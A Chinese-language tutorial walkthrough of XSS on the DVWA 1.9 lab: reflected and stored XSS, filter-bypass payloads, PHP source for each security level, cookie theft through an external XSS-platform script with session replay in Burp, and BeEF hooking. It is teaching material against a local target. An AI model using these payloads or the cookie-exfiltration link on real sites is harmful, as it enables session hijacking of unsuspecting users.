Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)

Cookie与session

  • 有状态会话与无状态会话:
    当我们登陆网站的时候,会输入用户名及密码等信息。
    当在无状态会话场景时,我们每次打开此网站均需要输入信息进行验证。
    有状态会话场景时,当第一次验证通过后,服务器会在http响应包中发送一个此用户唯一的信息(cookie)便于下次登陆无需再次验证。

  • Cookie: Cookie按照存储的位置可以分为:硬盘Cookie和内存Cookie
    硬盘Cookie:Cookie信息存储在客户端的硬盘中,由服务器设置过期时间。除非由用户清理或者过期否则硬盘Cookie不会被清除。
    内存Cookie:Cookie信息存储在客户端内存中,随着浏览器关闭后就会消失。

  • session:
    session与cookie的作用相同,也是用于服务器验证用户。不同的是,session信息存储在服务器,当用户打开网站到关闭网站即为一个session。浏览器关闭后,session也将注销。
    服务器通过SESSIONID来识别不同的用户,SESSIONID可以包含在http响应中的cookie的值中。

  • Cookie和session的区别就是存储的位置,Cookie存储在客户端;session存储在服务器,客户端仅存储一个SESSIONID

一、原理

由于后台程序对输入框的内容过滤不完善导致后台程序将用户输入恶意的JavaScript代码返回给浏览器,浏览器执行。

二、分类

  • 反射型XSS
    反射型XSS即只有用户点击连接后触发
  • 存储型XSS
    黑客构造好XSS代码并将这些恶意代码填到留言板等地方并发表,这些恶意代码存储到后台数据库中,所有访问留言板的用户均会受到攻击。
  • DOM型XSS

三、绕过

  1. 注意标签的闭合
    当构造的代码在,<textarea></code>等标签中时,需要考虑将这些标签闭合然后再将构造的代码加在后边。在div标签中可以不用闭合。</p> </li> <li> <p><strong>大小写绕过</strong><br> 有些使用了一些函数过滤script关键字,可以考虑ScriPt等随意改变只要与script不同即可</p> </li> <li> <p><strong>双写绕过</strong><br> 有些过滤看到script会将其删除可以进行双写,如scRiscriptpt进行绕过</p> </li> <li> <p><strong>图片标签加事件绕过</strong></p> </li> </ol> <p><a href="http://img.e-com-net.com/image/info8/7e0b0bd69b5a411cb795eb154997f81e.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/7e0b0bd69b5a411cb795eb154997f81e.png" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第1张图片" width="509" height="123" style="border:1px solid black;"></a></p> <pre><code><img src=# onerror=alert('xss')>) </code></pre> <p><a href="http://img.e-com-net.com/image/info8/c3411cf41da742728ed145bf9ad5a082.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c3411cf41da742728ed145bf9ad5a082.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第2张图片" width="650" height="262" style="border:1px solid black;"></a></p> <h1>四、漏洞利用</h1> <ul> <li>修改网页内容</li> <li>盗取cookie</li> <li>XSS蠕虫</li> <li>网站挂马</li> <li>重定向</li> </ul> <h1>五、DVWA、XSS反射型</h1> <h2>Low级别</h2> <p>直接输入<code><script>alert('xss');</script></code>进行测试<br> <a href="http://img.e-com-net.com/image/info8/1a68a84327d04f869f12274a2ce607e3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1a68a84327d04f869f12274a2ce607e3.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第3张图片" width="601" height="363" style="border:1px solid black;"></a></p> <h2>medium级别</h2> <p>依旧输入之前的测试代码进行测试,发现将script标签过滤<br> <a href="http://img.e-com-net.com/image/info8/eba654f937f840e99d3cb5bdb06d77c7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/eba654f937f840e99d3cb5bdb06d77c7.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第4张图片" width="491" height="138" style="border:1px solid black;"></a><br> 尝试大小写绕过<code><scripT>alert("xss");</sCript></code></p> <p><a href="http://img.e-com-net.com/image/info8/c11fd69476ea46febcdb4025344989cd.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c11fd69476ea46febcdb4025344989cd.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第5张图片" width="476" height="275" style="border:1px solid black;"></a><br> 尝试双写绕过<code><sc<script>ript>alert('xss');</scri<script>pt></code><br> <a href="http://img.e-com-net.com/image/info8/bdcfd126f1b245e5b898d960b9803bfd.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/bdcfd126f1b245e5b898d960b9803bfd.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第6张图片" width="474" height="216" style="border:1px solid black;"></a></p> <pre><code><?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = str_replace( '<script>', '', $_GET[ 'name' ] ); // Feedback for end user echo "<pre>Hello ${name}</pre>"; } ?> </code></pre> <p>查看网页代码,发现对输入的参数使用str_replace(参数1,参数2,参数3)进行过滤<br> 参数1为要查找的字符串,参数2为将参数1替换为什么,参数3为在哪里查找,这里使用黑名单的思想将<code><script></code>进行替换为空</p> <h2>high级别</h2> <p>基本语句测试</p> <pre><code><script>alert('xss');</script> </code></pre> <p><a href="http://img.e-com-net.com/image/info8/030b67139ea644f795a5c97d394abd7c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/030b67139ea644f795a5c97d394abd7c.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第7张图片" width="513" height="138" style="border:1px solid black;"></a><br> 大小写绕过</p> <pre><code><scripT>alert("xss");</sCript> </code></pre> <p><a href="http://img.e-com-net.com/image/info8/f4db4749e6cc4afb96daf62229efc95a.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f4db4749e6cc4afb96daf62229efc95a.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第8张图片" width="573" height="184" style="border:1px solid black;"></a><br> 失败<br> 双写结合大小写绕过</p> <pre><code><sC<script>ript>alert('xss');</Scri<script>pt> </code></pre> <p><a href="http://img.e-com-net.com/image/info8/fefbd74fbf9c4482b6b7e874ade3d3ef.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fefbd74fbf9c4482b6b7e874ade3d3ef.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第9张图片" width="541" height="176" style="border:1px solid black;"></a><br> 失败<br> 尝试其他标签</p> <pre><code><img src=1 onerror=alert('xss')> </code></pre> <p><a href="http://img.e-com-net.com/image/info8/2910f93b56b2481e83289d8c1267cfc3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/2910f93b56b2481e83289d8c1267cfc3.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第10张图片" width="565" height="317" style="border:1px solid black;"></a><br> 成功</p> <pre><code><?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); // Feedback for end user echo "<pre>Hello ${name}</pre>"; } ?> </code></pre> <p>高级别的防御通过正则表达式的替换函数preg_replace()来对script进行替换使得<code><script></code>标签无法使用<br> <strong>利用</strong></p> <p>页面跳转:<code><script>location.href="URL"</script></code><br> 通过XSS平台进行cookie的获取:<br> <a href="http://img.e-com-net.com/image/info8/14e2087571c043c5bcf9363f17f11284.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/14e2087571c043c5bcf9363f17f11284.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第11张图片" width="650" height="508" style="border:1px solid black;"></a><br> 我选择框中的代码,将此代码防入到反射型XSS框内然后提交。<br> 由于不同级别的知识存在标签的过滤,原理都是通过嵌入XSS平台的代码然后构造URL,受害者点击URL的时候会将cookie发送给XSS平台。所以这里我以low级别的进行利用。<br> <a href="http://img.e-com-net.com/image/info8/76daa45385df4aa9aecd6013149a07ec.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/76daa45385df4aa9aecd6013149a07ec.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第12张图片" width="650" height="294" style="border:1px solid black;"></a><br> 将代码加入框中发现是get方式进行提交,所以直接构造链接</p> <pre><code>http://192.168.1.4/vulnerabilities/xss_r/?name=<script src=https://xsspt.com/qrCRUy></script> </code></pre> <p>然后发送给受害者,此时我用本机的浏览器访问此链接并通过另一个用户进行登陆(用户名为1337)然后查看</p> <p>此时有一个前提就是受害者必须已经处在登陆的状态下然后再触发构造的链接<br> 如果受害者没有登陆也无法获取cookie</p> <p>所以我先以1377用户的身份登陆到网站,然后触发URL<br> 此时XSS平台接收到了信息<br> <a href="http://img.e-com-net.com/image/info8/a922eceeafef4c559366e718a36931f0.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/a922eceeafef4c559366e718a36931f0.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第13张图片" width="650" height="279" style="border:1px solid black;"></a><br> 然后黑客访问登陆之后的页面时,通过burp suite进行抓包修改其中的cookie(XSS获取到的)就会以受害者的身份登入到网站。注意这里黑客要访问的不是网站的登陆页面而是一个登陆后才可以访问的页面。<br> 这里我模拟黑客首先开启抓包,然后访问http://192.168.1.4/vulnerabilities/xss_r页面<br> <a href="http://img.e-com-net.com/image/info8/e9f12f64f0ce48ffa0bdd6c939259799.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/e9f12f64f0ce48ffa0bdd6c939259799.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第14张图片" width="549" height="369" style="border:1px solid black;"></a><br> 将cookie改为XSS中获取到的受害者的cookie<br> 然后点击forward<br> <a href="http://img.e-com-net.com/image/info8/1c25f0b8aa0b4a88aedf2cfdf8e2b2a1.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1c25f0b8aa0b4a88aedf2cfdf8e2b2a1.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第15张图片" width="650" height="547" style="border:1px solid black;"></a><br> 成功登陆并且是以1337的身份</p> <h1>六、XSS存储型</h1> <h2>Low级别</h2> <p>在message栏中直接输入测试代码<code><script>alert('xss')</script></code><br> <a href="http://img.e-com-net.com/image/info8/45094136893c4ea7adf78c3bb009f0ff.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/45094136893c4ea7adf78c3bb009f0ff.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第16张图片" width="544" height="386" style="border:1px solid black;"></a><br> 出现弹框,然后测试下name是否也存在XSS<br> 首先name框中允许输入最大长度小于我们的代码长度,右击审查元素查看<br> <a href="http://img.e-com-net.com/image/info8/5bebee1d9d974b87a6b833af07eea9fc.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/5bebee1d9d974b87a6b833af07eea9fc.jpg" alt="1" width="517" height="90"></a><br> 修改maxlength为更大然后输入测试代码,同样存在XSS漏洞</p> <pre><code><?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = mysql_real_escape_string( $message ); // Sanitize name input $name = mysql_real_escape_string( $name ); // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); //mysql_close(); } ?> </code></pre> <p>查看源码,对message和name首先通过trim()函数移除参数两边的"\0"、"\t"、"\n"、"\x0B"、"\r"、" "<br> 然后对于message,通过stripslashes()函数删除字符串中的""反斜杠,对测试语句貌似没有起作用<br> 最后通过mysql_real_escape_string()函数对字符串中的特殊符号进行转义<br> 而对于name只运用了mysql_real_escape_string()函数对其特殊符号进行转义</p> <h2>medium级别</h2> <p>在靶机中为了消除之前的实验的影响,可以清空留言数据<br> <a href="http://img.e-com-net.com/image/info8/6d2a3bad3f2b4dc9b866c3d3b80948cc.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/6d2a3bad3f2b4dc9b866c3d3b80948cc.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第17张图片" width="650" height="530" style="border:1px solid black;"></a><br> 同样先在message栏输入测试代码查看,显示将<code><script></code>标签过滤,并且将’进行了转义<br> <a href="http://img.e-com-net.com/image/info8/bc3cd8ca81234f93b0fce5d8deace731.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/bc3cd8ca81234f93b0fce5d8deace731.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第18张图片" width="586" height="294" style="border:1px solid black;"></a><br> 尝试大小写绕过<code><sCrIpt>alert(/xss/)</ScriPt></code><br> <a href="http://img.e-com-net.com/image/info8/e2284f694e3840f89e533107c360c9b9.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/e2284f694e3840f89e533107c360c9b9.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第19张图片" width="565" height="349" style="border:1px solid black;"></a><br> 依旧过滤,尝试双写和大小写结合<code><sCrIscriptpt>alert(/xss/)</ScrscriptIpT></code><br> 依旧不管用</p> <p>尝试使用图片标签<code><img src=1 onerror=alert(/xss/)></code><br> 依旧不管用</p> <p>然后对name框进行测试输入基本的测试语句,失败<br> 然后大小写绕过尝试<code><scrIPt>alert('xss')</scRipt></code><br> <a href="http://img.e-com-net.com/image/info8/ebcc8d1c5f194e3f81fa9283025d99bf.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ebcc8d1c5f194e3f81fa9283025d99bf.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第20张图片" width="450" height="269" style="border:1px solid black;"></a><br> 出现漏洞。<br> 最后查看下源代码</p> <pre><code><?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = mysql_real_escape_string( $message ); $message = htmlspecialchars( $message ); // Sanitize name input $name = str_replace( '<script>', '', $name ); $name = mysql_real_escape_string( $name ); // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); //mysql_close(); } ?> </code></pre> <p><strong>message</strong><br> 可以看到对message进行了五次过滤<br> 第一次:使用trim()移除字符串两边的"\0" - NULL、"\t" - 制表符、"\n" - 换行、"\x0B" - 垂直制表符、"\r" - 回车、" " - 空格符<br> 第二次:使用addslashes()函数将预定义的字符单引号(’)双引号(")反斜杠(\)之前添加<code>\</code><br> 对于此种转义可采取以下方法进行绕过:</p> <ol> <li>alert(/xss/)将alert中的内容使用/来包含</li> <li>将alert(‘xss’)中的’xss’进行编码<a href="http://img.e-com-net.com/image/info8/c315a3ef89224a15a3040ed3ddcc6fbf.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c315a3ef89224a15a3040ed3ddcc6fbf.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第21张图片" width="356" height="211" style="border:1px solid black;"></a>使用到了火狐上的一个插件HackBar</li> </ol> <p>第三次:使用strip_tags()函数,除去字符串中的html标签,所以<code><img></code>等标签会被过滤<br> 第四次:使用mysql_real_escape_string() 与上面的函数类似<br> 第五次使用了htmlspecialchars()函数,将&、" 、’ 、<、>转义为html实体,html实体可以理解为客户端请求服务器,服务器响应之后把页面的html代码返回给客户端浏览器,浏览器解析这些html代码,而这些html实体就是被解析的代码,浏览器先解析然后再显示给用户。所以输入的字符被转义为html实体后,浏览器通过渲染之后显示了字符原来的样子,并没有带入到代码中执行。</p> <p><strong>name</strong><br> 相对于message框,name框的过滤只有三种<br> 第一次使用trim()函数<br> 第二次使用str_replace()函数,示例中出现了三个参数,第一个为要替换的内容(<code><script></code>),第二个参数为替换成什么(空),第三个参数为对哪个字符串进行替换。<br> 可以采取以下方式绕过:</p> <ol> <li>大小写绕过,改变script的大小写</li> <li>双写绕过,如<code><sc<script>ript>alert('xss')</scr<script>ipt></code></li> <li>图片标签绕过,<code><img src=1 onerror=alert('xss')></code></li> </ol> <h2>high级别</h2> <pre><code><?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = mysql_real_escape_string( $message ); $message = htmlspecialchars( $message ); // Sanitize name input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name ); $name = mysql_real_escape_string( $name ); // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); //mysql_close(); } ?> </code></pre> <p>message依旧采取medium级别的方法进行过滤<br> name这里添加了preg_replace()函数,通过正则表达式来过滤<code><script></code>标签,可以使用<code><img></code>标签进行绕过</p> <pre><code><img src=1 onerror=alert(/xss/)> </code></pre> <p><a href="http://img.e-com-net.com/image/info8/f2370ec0942e451eade9bbc0f720b510.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f2370ec0942e451eade9bbc0f720b510.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第22张图片" width="412" height="325" style="border:1px solid black;"></a></p> <h1>七、使用BeEF</h1> <p>首先在kali打开BeEF,在左侧栏中点击图标会先弹出一个命令行窗口<br> 然后会打开一个网页,命令行窗口显示了一些配置,网页用户名密码均为beef<br> <a href="http://img.e-com-net.com/image/info8/9ae08871e0934a40b6af7ffb4aa8eac3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9ae08871e0934a40b6af7ffb4aa8eac3.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第23张图片" width="650" height="154" style="border:1px solid black;"></a><br> 利用命令行给出的方法,将脚本代码插入到存在XSS的地方。我这里选择插入到DVWA中存储型XSS漏洞的页面,将上图的Example中127.0.0.1的地址换为kali机的ip。这里的kali就相当于一台服务器。原理与XSS平台类似,就是将受害者的信息发送到kali的beef中。</p> <p><strong>上传xss代码</strong><br> <a href="http://img.e-com-net.com/image/info8/d07a4b60ba3c4d38b837695fd21757f5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d07a4b60ba3c4d38b837695fd21757f5.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第24张图片" width="606" height="313" style="border:1px solid black;"></a><br> 此时BeEF的网页中已经显示有自己中招<br> <a href="http://img.e-com-net.com/image/info8/b230caec63254fe88a7037d19a13a84e.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b230caec63254fe88a7037d19a13a84e.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第25张图片" width="650" height="164" style="border:1px solid black;"></a><br> 接下来我通过真机来进行访问存储型XSS页面通过1337用户的身份<br> <a href="http://img.e-com-net.com/image/info8/ba136cb063de478288e59768a4dbdc33.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ba136cb063de478288e59768a4dbdc33.jpg" alt="Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)_第26张图片" width="369" height="173" style="border:1px solid black;"></a><br> 此时又新增了一个受害者。</p> <p>这种方法类似与XSS平台,将那些构造好的脚本插入到留言板中,只要访问了页面的人都会向指定的服务器发送请求从而中招。</p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1274636374158360576"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(Web漏洞)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1833947163852369920.htm" title="python漏洞扫描模块_GitHub - PickledFish/SZhe_Scan: 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜..." target="_blank">python漏洞扫描模块_GitHub - PickledFish/SZhe_Scan: 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜...</a> <span class="text-muted">weixin_39714191</span> <a class="tag" taget="_blank" href="/search/python%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E6%A8%A1%E5%9D%97/1.htm">python漏洞扫描模块</a> <div>SZhe_Scan碎遮Web漏洞扫描器(懒癌晚期该项目于6月4日docker打包完毕,cheer!!碎遮1.0版本,该项目会持续维护更新,欢迎各位大师傅疯狂Star!!!特点对输入的域名或IP进行自动化信息搜集与漏洞扫描,支持添加POC进行漏洞检测,扫描结果可视化显示在web界面上使用python3编写,多线程+多进程进行资产扫描,前端使用html+css+javascript进行漏洞扫描系统的可</div> </li> <li><a href="/article/1829834404160172032.htm" title="网络安全售前入门08安全服务——Web漏洞扫描服务" target="_blank">网络安全售前入门08安全服务——Web漏洞扫描服务</a> <span class="text-muted">努力工作的网安人</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9C%8D%E5%8A%A1/1.htm">安全服务</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/1.htm">经验分享</a> <div>目录1.服务概述2.服务内容2.1代码层安全2.2应用层安全3.服务工具4.服务输出1.服务概述Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASPTOP10等主流安全漏洞。2.服务内容2.1代码层安全应用程序及代码在开发过程中,</div> </li> <li><a href="/article/1759734552575700992.htm" title="w25 web漏洞之xss" target="_blank">w25 web漏洞之xss</a> <span class="text-muted">杭城我最帅</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a> <div>pikachu靶场第一关-反射型xss(get)利用hpp漏洞破解第二关-反射型xss(post)登录:admin/123456修改postdata内的参数第三关-存储型xss在留言板输入message=alert(1)第四关-DOM型xsswhatdoyousee?是把输入框内的内容拼接url。常见XSS语句标签,xssxss第五关-DOM型xss跟第四关一样dvwa靶场第一关-xss(Refl</div> </li> <li><a href="/article/1759461554023116800.htm" title="2019年密码与安全新技术讲座-课程总结报告" target="_blank">2019年密码与安全新技术讲座-课程总结报告</a> <span class="text-muted">weixin_34345753</span> <a class="tag" taget="_blank" href="/search/%E5%AF%86%E7%A0%81%E5%AD%A6/1.htm">密码学</a> <div>2019年密码与安全新技术讲座-课程总结报告课程讲座总结网络(web)安全与内容安全信息化的发展使得信息安全越发重要。在网络中由于存在威胁方-防护方技术、成本、风险、主题的非对称性,维护信息安全的难度非常之高,没有哪一个系统敢说自己是绝对安全的,但起码应该对常见的威胁做出应对,避免系统被很容易的攻破。目前WEB应用中存在很多漏洞,常见的WEB漏洞如下:SQL注入攻击不管用什么语言编写的Web应用,</div> </li> <li><a href="/article/1759442621308153856.htm" title="干货 | 绕过WAF的常见Web漏洞利用分析" target="_blank">干货 | 绕过WAF的常见Web漏洞利用分析</a> <span class="text-muted">网络安全大白</span> <a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2/1.htm">黑客</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a> <div>前言本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法,希望能起到抛砖引玉的效果。如果师傅们有更好的方法,烦请不吝赐教。PS:本文仅用于技术研究与讨论,严禁用于任何非法用途,违者后果自负,作者与平台不承担任何责任测试环境PHPStudy(PHP5.4.45+Apache+MySQL5.5.53)+最新版安全狗(4.0.28330)靶场使用DVWA:http://</div> </li> <li><a href="/article/1756463821054033920.htm" title="<网络安全>《25 工业脆弱性扫描与管理系统》" target="_blank"><网络安全>《25 工业脆弱性扫描与管理系统》</a> <span class="text-muted">Ealser</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%B8%9A%E8%84%86%E5%BC%B1%E6%80%A7%E6%89%AB%E6%8F%8F%E4%B8%8E%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/1.htm">工业脆弱性扫描与管理系统</a> <div>1概念工业脆弱性扫描与管理系统以综合的漏洞规则库(本地漏洞库、ActiveX库、网页木马库、网站代码审计规则库等)为基础,采用深度主机服务探测、Web智能化爬虫、SQL注入状态检测、主机配置检查以及弱口令检查等方式相结合的技术,实现了将Web漏洞扫描、系统漏洞扫描、数据库漏洞扫描、基线配置核查、工控漏洞检查与弱口令扫描手、体的综合漏洞评估系统。2用户价值通过对各种流行攻击手段的分析整理,对漏洞提出</div> </li> <li><a href="/article/1755874686362730496.htm" title="SQL语法" target="_blank">SQL语法</a> <span class="text-muted">22的卡卡</span> <a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a> <div>#最近因为再把上个学期学过的web漏洞重新复习一遍,因为当时基础太差,听不太懂,这下重新看了书,就干脆全部再重新学一遍了。最开始的就是SQLINJECTION,所以把sql全部重新学了一遍,并且再linux的环境下全部实验了一遍,对一些系统库也了解了很多。当然sql注入利用的更灵活。##当然在刷sqlinjection的题目的时候,遇到了很多很多的一些函数,以及一些非常固定的方式的sql语句,也会</div> </li> <li><a href="/article/1755575139539369984.htm" title="Web 漏洞训练平台学习笔记(webgoat & juice shop)" target="_blank">Web 漏洞训练平台学习笔记(webgoat & juice shop)</a> <span class="text-muted">Beethen Tang</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>Web漏洞训练平台实验目的了解常见Web漏洞训练平台;了解常见Web漏洞的基本原理;掌握OWASPTop10及常见Web高危漏洞的漏洞检测、漏洞利用和漏洞修复方法;实验环境WebGoat/Juiceshopkali2021.2实验要求每个实验环境完成不少于5种不同漏洞类型的漏洞利用练习(可选)使用不同于官方教程中的漏洞利用方法完成目标漏洞利用练习(可选)最大化漏洞利用效果实验(可选)定位缺陷代码(</div> </li> <li><a href="/article/1755427782164234240.htm" title="WebWall-05.SQL-Inject(SQL注入漏洞)" 